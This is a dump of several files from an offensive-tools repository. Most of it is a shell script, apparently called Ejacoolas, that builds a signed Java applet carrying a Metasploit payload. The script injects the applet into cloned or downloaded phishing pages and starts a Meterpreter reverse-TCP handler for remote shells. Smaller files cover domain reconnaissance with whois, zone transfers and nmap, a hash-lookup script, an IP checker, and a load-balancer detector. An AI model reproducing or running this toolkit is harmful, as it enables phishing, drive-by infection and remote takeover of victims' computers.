253 | echo "import java.applet.Applet;
254 | import metasploit.Payload;
255 |
256 | public class $appletname extends Applet
257 | {
258 |
259 | public $appletname()
260 | {
261 | }
262 |
263 | public void init()
264 | {
265 | try
266 | {
267 | Payload.main(null);
268 | }
269 | catch(Exception exception)
270 | {
271 | exception.printStackTrace();
272 | }
273 | }
274 | }
275 | " > /tmp/$appletname.java
276 | cd /tmp/
277 |
278 | jar -xf ./$appletname.jar
279 | if [ "$?" != "0" ]; then
280 | echo -e "\033[1;31m[!] Error encountered during the extraction of the previously generated Jar file, exiting..."
281 | cleanup
282 | read userexit
283 | exit
284 | fi
285 |
286 | javac -d /tmp/ -classpath /tmp/ /tmp/$appletname.java
287 | if [ "$?" != "0" ]; then
288 | echo -e "\033[1;31m[!] Error encountered while generating the launcher CLASS file, exiting..."
289 | cleanup
290 | read userexit
291 | exit
292 | fi
293 | rm /tmp/$appletname.java 2>/dev/null
294 |
295 | jar -uf ./$appletname.jar ./$appletname.class
296 | if [ "$?" != "0" ]; then
297 | echo -e "\033[1;31m[!] Error encountered while updating the previously generated jar file with the launcher CLASS file, exiting..."
298 | cleanup
299 | read userexit
300 | exit
301 | else echo -e "\033[1;32m[->] Jar file successfully updated with the launcher CLASS file.\n"
302 | rm /tmp/$appletname.class 2>/dev/null
303 | rm /tmp/metasploit.dat 2>/dev/null
304 | rm -R /tmp/metasploit 2>/dev/null
305 | rm -R /tmp/META-INF 2>/dev/null
306 | fi
307 |
308 | #SIGN THE JAR
309 | echo -e "\033[1;37m[...] Generating the key and signing the Jar file..."
310 | echo -e "\033[1;37mPlease insert the required data for the Jar file when prompted. Those data will be visible to your victim, so insert something convincing.\n\033[0;37m"
311 |
312 | keytool -genkey -alias $appletname -keystore mykeystore -keypass mykeypass -storepass mystorepass
313 | if [ "$?" != "0" ]; then
314 | echo -e "\033[1;31m[!] Error encountered while generating the key, exiting..."
315 | cleanup
316 | read userexit
317 | exit
318 | fi
319 |
320 | jarsigner -keystore mykeystore -keypass mykeypass -storepass mystorepass /tmp/$appletname.jar $appletname
321 | if [ "$?" != "0" ]; then
322 | echo -e "\033[1;31m[!] Error encountered while signing the Jar file with the new key, exiting..."
323 | cleanup
324 | read userexit
325 | exit
326 | else echo -e "\033[1;32m[->] Evil Java Applet successfully generated!\n"
327 | fi
328 |
329 | keytool -delete -alias $appletname -keystore mykeystore -keypass mykeypass -storepass mystorepass
330 | if [ "$?" != "0" ]; then
331 | echo -e "\033[1;31m[!] Error encountered while deleting the used key. However, the applet will properly work: press ENTER to continue..."
332 | read userexit
333 | fi
334 | rm /tmp/mykeystore 2>/dev/null
335 | }
336 |
337 | #OUTPUT
338 |
339 | saveapplet () {
340 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the generated applet (default: $defaultfolder), or enter \"back\" to return to previous menu:"
341 | read outputfolder
342 | if [ "$outputfolder" == "back" ]; then
343 | outputmenu
344 | fi
345 | if [[ "$outputfolder" == "" || "$outputfolder" == "$defaultfolder2" ]]; then
346 | outputfolder=$defaultfolder
347 | fi
348 | if [ "$outputfolder" == "$defaultfolder" ]; then
349 | mkdir $defaultfolder 2>/dev/null
350 | fi
351 | if [ ! -d $outputfolder ]; then
352 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
353 | saveapplet
354 | else cp /tmp/$appletname.jar $outputfolder/
355 | if [[ "$?" != "0" || ! -s $outputfolder/$appletname.jar ]]; then
356 | echo -e "\033[1;31m[!] Error encountered while saving the Evil Java Applet to $outputfolder, saving it to $defaultfolder..."
357 | outputfolder=$defaultfolder
358 | mkdir $defaultfolder 2>/dev/null
359 | cp /tmp/$appletname.jar $outputfolder #AGGIUNGI ULTERIORE CONTROLLO!!!
360 | fi
361 | echo -e "\033[1;32m[->] $appletname.jar successfully saved to $outputfolder!\n"
362 | appletsaved=1
363 | echo -e "\033[1;37mPress ENTER to return to the main menu...\n"
364 | read usercontinue
365 | outputmenu
366 | fi
367 | }
368 |
369 | cloneagain() {
370 | echo -e "\033[1;37mDo you want to try entering another URL? If not, you'll return to the main menu. [y|n] (default: \"y\")"
371 | read userinput3
372 | if [ "$userinput3" == "" ]; then
373 | userinput3=y
374 | fi
375 | case $userinput3 in
376 | n) outputmenu;;
377 | y) clonesite;;
378 | *) echo -e "Please insert just \"y\" or \"n\"...\n"
379 | cloneagain;;
380 | esac
381 | }
382 |
383 | outputpage() {
384 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the infected page and the Evil Java Applet. Existing files with the same names will be overwritten, so be careful! (default: $defaultfolder):"
385 | read userpage
386 | if [[ "$userpage" == "" || "$userpage" == "$defaultfolder2" ]]; then
387 | userpage=$defaultfolder
388 | fi
389 | if [ "$userpage" == "$defaultfolder" ]; then
390 | mkdir $defaultfolder 2>/dev/null
391 | fi
392 | if [ ! -d $userpage ]; then
393 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
394 | outputpage
395 | else mv /tmp/sitetmp/* $userpage/
396 | if [[ "$?" != "0" || ! -s $userpage/$appletname.jar || ! -s $userpage/index.html ]]; then
397 | echo -e "\033[1;31m[!] Error encountered while saving the infected page and the Evil Java Applet to $userpage. Saving them to $defaultfolder..."
398 | userpage=$defaultfolder
399 | mkdir $defaultfolder 2>/dev/null
400 | mv /tmp/sitetmp/* $userpage/ #AGGIUNGI ULTERIORE CONTROLLO!!!
401 | fi
402 | echo -e "\033[1;32m[->] The infected web page along with the Evil Java Applet were successfully moved to $userpage.\n"
403 | echo -e "\033[1;37mPress ENTER to return to the main menu..."
404 | read userexit
405 | savepage="1"
406 | outputmenu
407 | fi
408 | }
409 |
410 |
411 |
412 | infectpage() {
413 | echo -e "\033[1;37m[...] Attempting to infect the web page with the Evil Java Applet..."
414 | cp /tmp/$appletname.jar $pathtoindex/ 2>/dev/null
415 | if [[ "$?" != "0" || ! -s $pathtoindex/$appletname.jar ]]; then
416 | echo -e "\033[1;31m[!] Error encountered while copying $appletname.jar to $pathtoindex/, you'll have to manually infect the web page (actually in $pathtoindex)with the Evil Java Applet.\n"
417 | outputmenu
418 | else echo "" >> $pathtoindex/index.html
419 | if [ "$?" != "0" ]; then
420 | echo -e "\033[1;31m[!] Error encountered while adding some evil HTML code to $pathtoindex/index.html. You'll have to do that manually.
421 |
422 | \033[1;37mThis is the evil HTML code:
423 |
424 | \033[0;37m
425 |
426 | \033[1;37mAdd it to $pathtoindex/index.html and it will be infected with the Evil Java Applet. Remember to keep the infected index.html file and \"$appletname.jar\" always in the same folder (actually they're both in $pathtoindex/).\n"
427 | outputmenu
428 | else echo -e "\033[1;32m[->] Web page successfully infected!\n"
429 | fi
430 | fi
431 | if [ "$localpage" == "1" ]; then
432 | echo -e "\033[1;37mYou'll find the infected page (\"index.html\") along with the Evil Java Applet in $pathtoindex. Press ENTER to return to the main menu..."
433 | read userexit
434 | savepage="1"
435 | outputmenu
436 | else outputpage
437 | fi
438 | }
439 |
440 | clonesite() {
441 | echo -e "\n\033[1;37mPlease enter the URL to clone (example: http://www.google.com) (enter \"back\" to return to previous menu):"
442 | read cloneurl
443 | if [ "$cloneurl" == "" ]; then
444 | clonesite
445 | fi
446 | if [ "$cloneurl" == "back" ]; then
447 | infectmenu
448 | fi
449 | echo -e "\033[1;37m[...] Attempting to clone $cloneurl..."
450 | mkdir /tmp/sitetmp 2>/dev/null
451 | wget --convert-links -w 3 --random-wait --no-dns-cache --referer="http://torpedo48.it" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -P /tmp/sitetmp -erobots=off -q -nH $cloneurl
452 | if [[ "$?" != "0" || ! -s /tmp/sitetmp/index.html ]]; then
453 | echo -e "\033[1;31m[!] Error encountered while cloneing URL $cloneurl . An \"index.html\" file couldn't be generated."
454 | cloneagain
455 | else echo -e "\033[1;32m[->] URL $cloneurl successfully cloned to /tmp/sitetmp/.\n"
456 | pathtoindex=/tmp/sitetmp
457 | infectpage
458 | fi
459 | }
460 |
461 | selectpage() {
462 | echo -e "\n\033[1;37mPlease enter the path to the web page you want to infect. Note that it must be named \"index.html\", or it won't be detected (you'll be able to change its name later). (enter \"back\" to return to previous menu)"
463 | read pathtoindex
464 | if [ "$pathtoindex" == "back" ]; then
465 | infectmenu
466 | elif [ "$pathtoindex" == "" ]; then
467 | selectpage
468 | elif [ ! -d $pathtoindex ]; then
469 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
470 | selectpage
471 | elif [ ! -s $pathtoindex/index.html ]; then
472 | echo -e "\033[1;31m[!] No \"index.html\" file found in $pathtoindex.\n"
473 | selectpage
474 | else localpage=1
475 | echo -e "\033[1;32m[->] \"index.html\" file found in $pathtoindex\n"
476 | infectpage
477 | fi
478 | }
479 |
480 | infectmenu() {
481 | echo -e "\n\033[1;37mDo you want to infect a \033[4ml\033[0m\033[1;37mocal web page or to \033[4mc\033[0m\033[1;37mlone an online web page and infect it (enter \"back\" to return to previous menu)? [l|c|back]"
482 | read userinfectmenu
483 | case $userinfectmenu in
484 | back) outputmenu;;
485 | l) selectpage;;
486 | c) if [ "$silentmode" != "1" ]; then
487 | clonesite
488 | else echo -e "\033[1;31m[!] Warning: Silent Mode is ON. This feature requires data downloading from the Internet. Do you want to proceed? [y|n] (default: \"n\")\033[0;37m"
489 | read userchoice
490 | if [ "$userchoice" == "" ]; then
491 | userchoice=n
492 | fi
493 | case $userchoice in
494 | n) outputmenu;;
495 | y) echo -e "\n\n"
496 | clonesite;;
497 | *) outputmenu;;
498 | esac
499 | fi;;
500 | *) echo -e "Please insert your selection.\n"
501 | infectmenu;;
502 | esac
503 | }
504 |
505 | showcode() {
506 | echo -e "\033[1;37m\nThis is the HTML code you should add to a web page in order to infect it with the Evil Java Applet:
507 |
508 | \033[0;37m
509 |
510 | \033[1;37mRemember that it'll work only if your web page and \"$appletname.jar\" reside in the same folder.
511 |
512 | You need that code only if you plan to manually infect a web page with the Evil Java Applet: this script can do that for you (hopefully) if you choose option 2 in the menu.
513 |
514 | Press ENTER to return to the main menu...\n"
515 | read usercontinue
516 | outputmenu
517 | }
518 |
519 | starthandler() {
520 | echo -e "\033[1;37m[...] Starting the handler..."
521 | echo "use exploit/multi/handler
522 | set LHOST $ip
523 | set LPORT $port
524 | set ExitOnSession false
525 | set payload java/meterpreter/reverse_tcp
526 | exploit -j" > /tmp/$appletname.handler.rc
527 | cd /pentest/
528 | msfconsole -r /tmp/$appletname.handler.rc
529 | rm /tmp/$appletname.handler.rc
530 | outputmenu
531 | }
532 |
533 | savehandler() {
534 | echo -e "\033[1;37mPlease specify the folder where you want to save the generated handler script (default: $defaultfolder):"
535 | read outputhandler
536 | if [[ "$outputhandler" == "" || "$outputhandler" == "$defaultfolder2" ]]; then
537 | outputhandler=$defaultfolder
538 | fi
539 | if [ "$outputhandler" == "$defaultfolder" ]; then
540 | mkdir $defaultfolder 2>/dev/null
541 | fi
542 | if [ ! -d $outputhandler ]; then
543 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry.\n"
544 | savehandler
545 | else cp /tmp/$appletname.handler.sh $outputhandler/
546 | if [[ "$?" != "0" || ! -s $outputhandler/$appletname.handler.sh ]]; then
547 | echo -e "\033[1;31m[!] Error encountered while saving the Evil Java Applet handler script to $outputhandler, saving it to $defaultfolder..."
548 | outputhandler=$defaultfolder
549 | mkdir $defaultfolder 2>/dev/null
550 | cp /tmp/$appletname.handler.sh $outputhandler #AGGIUNGI ULTERIORE CONTROLLO!!!
551 | fi
552 | echo -e "\033[1;32m[->] $appletname.handler.sh successfully saved to $outputhandler!\n"
553 | handlersaved=1
554 | echo -e "\033[1;37mPlease note that that handler works only as long as your IP is $ip and your port $port is disposable.
555 |
556 | Press ENTER to return to the main menu...\n"
557 | read usercontinue
558 | outputmenu
559 | fi
560 | }
561 |
562 | createhandler() {
563 | echo -e "\033[1;37m\n[...] Generating the Evil Java Applet handler script..."
564 | echo "echo -e \"\033[1;37m[...] Starting the handler...\"
565 | echo \"use exploit/multi/handler
566 | set LHOST $ip
567 | set LPORT $port
568 | set ExitOnSession false
569 | set payload java/meterpreter/reverse_tcp
570 | exploit -j\" > /tmp/$appletname.handler2.rc
571 | cd /pentest/
572 | msfconsole -r /tmp/$appletname.handler2.rc
573 | rm /tmp/$appletname.handler2.rc" > /tmp/$appletname.handler.sh
574 | chmod +x /tmp/$appletname.handler.sh 2>/dev/null
575 | if [[ "$?" != "0" || ! -s /tmp/$appletname.handler.sh ]]; then
576 | echo -e "\033[1;31m[!] Error encountered while generating the Evil Java Applet handler script. Press ENTER to return to the main menu..."
577 | read usercontinue
578 | outputmenu
579 | else echo -e "\033[1;32m[->] $appletname.handler.sh successfully generated!\n"
580 | savehandler
581 | fi
582 | }
583 |
584 | templatesave() {
585 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the infected template page. Existing files with the same names will be overwritten, so be careful! (default: $defaulttemplatedir):"
586 | read userpage
587 | if [[ "$userpage" == "" || "$userpage2" == "$defaulttemplatedir2" ]]; then
588 | userpage=$defaulttemplatedir
589 | fi
590 | if [ "$userpage" == "$defaulttemplatedir" ]; then
591 | mkdir $defaultfolder 2>/dev/null
592 | mkdir $defaulttemplatedir 2>/dev/null
593 | fi
594 | if [ ! -d $userpage ]; then
595 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
596 | templatesave
597 | else mv $templatetmp/* $userpage/
598 | if [[ "$?" != "0" || ! -s $userpage/$appletname.jar || ! -s $userpage/index.html ]]; then
599 | echo -e "\033[1;31m[!] Error encountered while saving the infected page and the Evil Java Applet to $userpage. Saving them to $defaulttemplatedir..."
600 | userpage=$defaulttemplatedir
601 | mkdir $defaulttemplatedir 2>/dev/null
602 | mv $templatetmp/* $userpage/ #AGGIUNGI ULTERIORE CONTROLLO!!!
603 | fi
604 | fi
605 | echo -e "\033[1;32m[->] The infected template page along with the Evil Java Applet were successfully moved to $userpage.\n"
606 | echo -e "\033[1;37mPress ENTER to return to the main menu..."
607 | read userexit
608 | rm -R $templatetmp
609 | savepage="1"
610 | outputmenu
611 | }
612 |
613 | templateselection() {
614 | templatefile=/tmp/templatestmp
615 | echo -e "\033[1;37m[...] Looking for templates at torpedo48.it..."
616 | wget -q http://torpedo48.it/phishing/templates -O $templatefile
617 | if [ ! -s $templatefile ]; then
618 | echo -e "\033[1;31m[!] Error encountered while connecting to the database, returning to the main menu..."
619 | sleep 3
620 | echo -e "\n\n\n"
621 | outputmenu
622 | else echo -e "\n"
623 | fi
624 | numbers=`awk '{print $1}' $templatefile`
625 | templatetmp=/tmp/t48_tmplt
626 | echo -e "\033[1;37m\nPlease select the template you want to use. Use the provided link for every template to see how it looks.\n"
627 |
628 | for number in $numbers
629 | do
630 | description[$number]=`grep "^$number" $templatefile | awk '{print $2}' | tr '.' ' '`
631 | descriptionpoint[$number]=`grep "^$number" $templatefile | awk '{print $2}'`
632 | filename[$number]=`grep "^$number" $templatefile | awk '{print $3}'`
633 | archive[$number]=`grep "^$number" $templatefile | awk '{print $4}'`
634 | url[$number]=`grep "^$number" $templatefile | awk '{print $5}'`
635 | echo "[$number]- ${description[$number]}
636 | (example link: ${url[$number]})"
637 | done
638 | echo "[99]- Back to main menu"
639 | tot=$number
640 | read selecttemplate
641 | if [ "$selecttemplate" == "99" ]; then
642 | echo -e "\n\n\n"
643 | outputmenu
644 | elif [[ $selecttemplate -gt $tot || $selecttemplate -lt 1 ]]; then
645 | echo -e "That's not an option, please try again...\n\n"
646 | templateselection
647 | fi
648 | for number in $numbers
649 | do
650 | if [ "$selecttemplate" == "$number" ]; then
651 | echo -e "\033[1;37m\n[...] Downloading the selected template..."
652 | mkdir $templatetmp 2>/dev/null
653 | if [ ! -d $templatetmp ]; then
654 | echo -e "\033[1;31m[!] Error encountered while creating the temporary folder in /tmp/, returning to the main menu...\n\n\n"
655 | sleep 3
656 | outputmenu
657 | fi
658 | wget -P $templatetmp/ -q ${filename[$number]} -O $templatetmp/${archive[$number]}
659 | if [ "$?" != "0" ]; then
660 | echo -e "\033[1;31m[!] Error encountered while downloading the template from torpedo48.it, returning to the main menu...\n\n\n"
661 | sleep 3
662 | outputmenu
663 | fi
664 | echo -e "\033[1;37m\n[...] Extracting the compressed file...\n"
665 | cd $templatetmp
666 | tar -xzf $templatetmp/${archive[$number]}
667 | if [ "$?" != "0" ]; then
668 | echo -e "\033[1;31m[!] Error encountered while extracting the downloaded archive, returning to the main menu...\n\n\n"
669 | sleep 3
670 | outputmenu
671 | fi
672 | rm $templatetmp/${archive[$number]}
673 | echo -e "\033[1;37m[...] Attempting to infect the web page with the Evil Java Applet..."
674 | cp /tmp/$appletname.jar $templatetmp/ 2>/dev/null
675 | if [[ "$?" != "0" || ! -s $templatetmp/$appletname.jar ]]; then
676 | echo -e "\033[1;31m[!] Error encountered while copying $appletname.jar to $templatetmp/, you'll have to manually infect the web page (actually in $templatetmp)with the Evil Java Applet.\n"
677 | outputmenu
678 | else echo "" >> $templatetmp/index.html
679 | if [ "$?" != "0" ]; then
680 | echo -e "\033[1;31m[!] Error encountered while adding some evil HTML code to $templatetmp/index.html. You'll have to do that manually.
681 |
682 | \033[1;37mThis is the evil HTML code:
683 |
684 | \033[0;37m
685 |
686 | \033[1;37mAdd it to $templatetmp/index.html and it will be infected with the Evil Java Applet. Remember to keep the infected index.html file and \"$appletname.jar\" always in the same folder (actually they're both in $templatetmp/).\n"
687 | outputmenu
688 | else echo -e "\033[1;32m[->] Web page successfully infected!\n"
689 | fi
690 | fi
691 | defaulttemplatedir=/root/Ejacoolas/${descriptionpoint[$number]}
692 | defaulttemplatedir2=/root/Ejacoolas/${descriptionpoint[$number]}/
693 | rm $templatefile
694 | templatesave
695 | fi
696 | done
697 | }
698 |
699 | outputmenu() {
700 | localpage="0"
701 | echo -e "\033[1;37m\nWhat do you want to do now?\n"
702 |
703 | if [ "$appletsaved" != "1" ]; then
704 | echo -e "\033[1;37m[1]- Save the Evil Java Applet to a directory for future use"
705 | else echo -e "\033[1;37m[1]- \033[1;9;37mSave the Evil Java Applet to a directory for future use\033[0m"
706 | fi
707 | if [ "$savepage" != "1" ]; then
708 | echo -e "\033[1;37m[2]- Infect a web page (local or cloned) with the Evil Java Applet"
709 | else echo -e "\033[1;37m[2]- Infect another web page (local or cloned) with the Evil Java Applet"
710 | fi
711 | echo -e "\033[1;37m[3]- Download a phishing template from torpedo48.it and infect it"
712 | echo -e "\033[1;37m[4]- Show the HTML code that triggers the Evil Java Applet"
713 | echo -e "\033[1;37m[5]- Start an Evil Java Applet handler"
714 | echo -e "\033[1;37m[6]- Create a script for starting an Evil Java Applet handler"
715 | echo -e "\033[1;37m[7]- Discard current Applet and create a new one"
716 | echo -e "\033[1;37m[9]- Exit from Ejacoolas"
717 | echo -e "\n"
718 | read usermenu
719 | case $usermenu in
720 | 1) if [ "$appletsaved" != "1" ]; then
721 | saveapplet
722 | else echo -e "$appletname.jar already saved to $outputfolder!\n"
723 | outputmenu
724 | fi;;
725 | 2) infectmenu;;
726 | 3) if [ "$silentmode" != "1" ]; then
727 | templateselection
728 | else echo -e "\033[1;31m[!] Warning: Silent Mode is ON. This feature requires data downloading from the Internet. Do you want to proceed? [y|n] (default: \"n\")\033[0;37m"
729 | read userchoice
730 | if [ "$userchoice" == "" ]; then
731 | userchoice=n
732 | fi
733 | case $userchoice in
734 | n) outputmenu;;
735 | y) echo -e "\n\n"
736 | templateselection;;
737 | *) outputmenu;;
738 | esac
739 | fi;;
740 | 4) showcode;;
741 | 5) starthandler;;
742 | 6) createhandler;;
743 | 7) echo -e "\033[1;31m[!] Warning: do you really want to discard the current Evil Java Applet? [y|n] (default: \"n\")\033[0m"
744 | read discardapplet
745 | if [ "$discardapplet" == "" ]; then
746 | discardapplet="n"
747 | fi
748 | case $discardapplet in
749 | y) rm /tmp/$appletname.jar 2>/dev/null
750 | appletsaved=0
751 | savepage=0
752 | echo -e "\n\n"
753 | createapplet
754 | outputmenu;;
755 | n) outputmenu;;
756 | *) outputmenu;;
757 | esac;;
758 | 9) if [[ "$appletsaved" == "1" || "$savepage" == "1" ]]; then
759 | cleanup
760 | exit
761 | else echo -e "\033[1;31m[!] Warning: you haven't exported your applet yet. If you exit now, it will be deleted. Do you really want to exit? [y|n] (default: \"n\")\033[0m"
762 | read userexit2
763 | if [ "$userexit2" == "" ]; then
764 | userexit2="n"
765 | fi
766 | case $userexit2 in
767 | y) cleanup
768 | exit;;
769 | n) outputmenu;;
770 | *) outputmenu;;
771 | esac
772 | fi;;
773 | *) echo -e "Please insert a valid selection.\n"
774 | outputmenu;;
775 | esac
776 | }
777 |
778 | if [ "$imported" == "1" ]; then
779 | outputmenu
780 | else createapplet
781 | outputmenu
782 | fi
783 |
784 |
785 | ###NOTES
786 |
787 | #AGGIUNGI AL CODICE HTML DELL'APPLET IL REDIRECT ALLA PAGINA ORIGINALE, CHE FA FIGO!!
788 | #AGGIUNGI TRUE ONLINE MODE (WAN MODE)
789 | #AGGIUNGI LO SPOSTAMENTO AUTOMATICO IN var/www e L'AVVIO DI APACHE
790 | #AGGIUNGI UNA MODALITà DNS CACHE POISONING AUTOMATICA
791 |
792 |
--------------------------------------------------------------------------------
/hackpack/hackpack/enum.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | clear
4 | #DEFINED COLOR SETTINGS
5 | RED=$(tput setaf 1 && tput bold)
6 | GREEN=$(tput setaf 2 && tput bold)
7 | STAND=$(tput sgr0)
8 | BLUE=$(tput setaf 6 && tput bold)
9 |
10 |
11 |
12 | echo ""
13 | echo ""
14 | echo ""
15 | echo $RED" +##############################################+"
16 | echo $RED" + em3rgency's Domain enumeration script +"
17 | echo $RED" + +"
18 | echo $RED" + Version 1.0 +"
19 | echo $RED" + +"
20 | echo $RED" + www.em3rgency.com +"
21 | echo $RED" +##############################################+"
22 | echo ""
23 | echo $BLUE" Visit http://www.em3rgency.com for updates to this script. Thanks"
24 | echo ""
25 | echo $BLUE" This script will perform various reconnaissance on your target domain."
26 | sleep 3
27 | clear
28 |
29 |
30 |
31 | echo ""
32 | echo $RED" **************************************";
33 | echo $RED" * 1. WHOIS lookup *";
34 | echo $RED" * 2. Dig and host list *";
35 | echo $RED" * 3. TCP traceroute *";
36 | echo $RED" * 4. DNS enumeration *";
37 | echo $RED" * 5. Fierce *";
38 | echo $RED" * 6. Nmap *";
39 | echo $RED" * 7. Enumerate ALL *";
40 | echo $RED" * 8. EXIT *";
41 | echo $RED" **************************************";
42 |
43 | echo $BLUE" Select Menu Option:"$STAND
44 | read menuoption
45 |
46 | if [ $menuoption = "1" ]; then
47 | echo "Enter the target EG. domain.org"
48 | read target
49 | whois $target
50 | echo ""
51 | read -p "Please press ENTER to return to the menu"
52 | ./enum.sh
53 | else
54 |
55 |
56 | if [ $menuoption = "2" ]; then
57 | echo "Enter the target EG. domain.org"
58 | read target
59 | dig $target any
60 | echo ""
61 | echo ""
62 | host -l $target
63 | echo ""
64 | read -p "Please press ENTER to return to the menu"
65 | ./enum.sh
66 | else
67 |
68 | if [ $menuoption = "3" ]; then
69 | echo "Enter the target EG. domain.org"
70 | read target
71 | echo ""
72 | echo $STAND"Please type the name of your network interface Example: eth0 "
73 | read IFACE;
74 | echo ""
75 | echo ""
76 | tcptraceroute -i $IFACE $target
77 | ./enum.sh
78 | else
79 |
80 | if [ $menuoption = "4" ]; then
81 | echo "Enter the target EG. domain.org"
82 | read target
83 | echo ""
84 | cd /pentest/enumeration/dns/dnsenum
85 | perl dnsenum.pl --enum -f dns.txt --update a -r $target
86 | echo ""
87 | read -p "Please press ENTER to return to the menu"
88 | ./enum.sh
89 | else
90 |
91 | if [ $menuoption = "5" ]; then
92 | echo "Enter the target EG. domain.org"
93 | read target
94 | echo ""
95 | cd /pentest/enumeration/dns/fierce
96 | perl fierce.pl -dns $target
97 | echo ""
98 | read -p "Please press ENTER to return to the menu"
99 | ./enum.sh
100 | else
101 |
102 | if [ $menuoption = "6" ]; then
103 | echo "Enter the target EG. domain.org"
104 | read target
105 | echo ""
106 | cd /root
107 | nmap -PN -n -F -T4 -sV -A -oG $target.txt $target
108 | echo ""
109 | read -p "Please press ENTER to return to the menu"
110 | ./enum.sh
111 | else
112 |
113 | if [ $menuoption = "7" ]; then
114 | echo "Enter the target EG. domain.org"
115 | read target
116 | echo ""
117 | echo ""
118 | whois $target
119 | echo ""
120 | echo ""
121 | dig $target any
122 | echo ""
123 | echo ""
124 | host -l $target
125 | echo ""
126 | echo ""
127 | tcptraceroute -i eth0 $target
128 | echo ""
129 | echo ""
130 | cd /pentest/enumeration/dns/dnsenum
131 | perl dnsenum.pl --enum -f dns.txt --update a -r $target
132 | echo ""
133 | echo ""
134 | echo dnstracer $target
135 | dnstracer $target
136 | echo ""
137 | echo ""
138 | cd /pentest/enumeration/dns/fierce
139 | perl fierce.pl -dns $target
140 | echo ""
141 | echo ""
142 | cd /pentest/enumeration/web/lbd
143 | ./lbd.sh $target
144 | echo ""
145 | echo ""
146 | cd /pentest/enumeration/list-urls
147 | ./list-urls.py http://www.$target
148 | echo ""
149 | echo ""
150 | cd /root
151 | nmap -PN -n -F -T4 -sV -A -oG $target.txt $target
152 | echo ""
153 | echo ""
154 | amap -i $target.txt
155 | echo ""
156 | echo ""
157 | cd /pentest/enumeration/web/httprint/linux
158 | ./httprint -h www.$target -s signatures.txt -P0
159 | echo ""
160 | echo ""
161 | read -p "Please press ENTER to return to the menu"
162 | ./enum.sh
163 | else
164 |
165 | if [ $menuoption = "8" ]; then
166 | exit
167 | fi
168 | fi
169 | fi
170 | fi
171 | fi
172 | fi
173 | fi
174 | fi
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
--------------------------------------------------------------------------------
/hackpack/hackpack/googli.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 | use HTTP::Request::Common;
5 | use LWP::Simple;
6 |
7 | system(clear);
8 | print " #################################################\n";
9 | print " # www.Top-Hat-Sec.com #\n";
10 | print " # #\n";
11 | print " # by :xd00sry #\n";
12 | print " #################################################\n";
13 |
14 |
15 | print "\e[1;34m==> \e[0m\e[1;40mEnter the hash :\e[0m";
16 | $hash=;
17 | chop($hash);
18 | if ($hash eq '')
19 | {
20 | print "\e[1;33m [!] Error No Hash entered!\e[0m\n";
21 | exit(0);
22 | }
23 |
24 | print "\e[1;41m Ok !\e[0m\n";
25 | $url = "https://goog.li/?q=$hash";
26 | $lwp = LWP::UserAgent->new();
27 | $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
28 | $connect = $lwp -> get($url);
29 |
30 | print "====> ";
31 | if ($connect->content =~ /(.*)<\/b><\/span><\/abbr>/)
32 | {
33 | print "Result : \e[0m\e[1;32;40m$1\e[0m\n";
34 | } else {
35 | print "Result : \e[1;31mHash not Found\e[0m\n";
36 | }
37 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ipchecker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | clear
4 |
5 |
6 |
7 | echo "######################################"
8 | echo "# http://www.top-hat-sec.com #"
9 | echo "# Email: admin@top-hat-sec.com #"
10 | echo "# Challenge = Opportunity #"
11 | echo "######################################"
12 |
13 | echo ""
14 | echo ""
15 | echo "Checking Assigned ISP IP Address"
16 | echo "This may take a few seconds"
17 | echo ""
18 | echo "Your IP is: "
19 | curl -s checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//'
20 | echo ""
21 | echo "If you do not see your IP address, you may not be connected to the internet."
22 |
23 |
24 |
--------------------------------------------------------------------------------
/hackpack/hackpack/lbd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # lbd (load balancing detector) detects if a given domain uses
3 | # DNS and/or HTTP Load-Balancing (via Server: and Date: header and diffs between server answers)
4 | # Copyright (C) 2010 Stefan Behte
5 | #
6 | # This program is free software; you can redistribute it and/or
7 | # modify it under the terms of the GNU General Public License
8 | # as published by the Free Software Foundation; either version 2
9 | # of the License, or (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | # GNU General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU General Public License
17 | # along with this program; if not, write to the Free Software
18 | # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
19 | #
20 | # License: GNU General Public License, version 2
21 | # http://www.gnu.org/licenses/gpl-2.0.html
22 | #
23 | # Contact me, if you have any new ideas, bugs/bugfixes, recommondations or questions!
24 | # Please also contact me, if you just like the tool. :)
25 | #
26 | # Stefan dot Behte at gmx dot net
27 | #
28 | # 0.1: - initial release
29 | # 0.2: - fix license for fedora
30 | # - fix indenting
31 | #
32 |
33 | QUERIES=50
34 | DOMAIN=$1
35 | METHODS=""
36 |
37 | echo
38 | echo "lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing."
39 | echo " Written by Stefan Behte (http://ge.mine.nu)"
40 | echo " Proof-of-concept! Might give false positives."
41 |
42 | if [ "$1" = "" ]
43 | then
44 | echo "usage: $0 [domain]"
45 | echo
46 | exit -1
47 | fi
48 |
49 | echo -e -n "\nChecking for DNS-Loadbalancing:"
50 | NR=`host $DOMAIN | grep -c "has add"`
51 |
52 | if [ $NR -gt 1 ]
53 | then
54 | METHODS="DNS"
55 | echo " FOUND"
56 | host $DOMAIN | grep "has add"
57 | echo
58 | else
59 | echo " NOT FOUND"
60 | fi
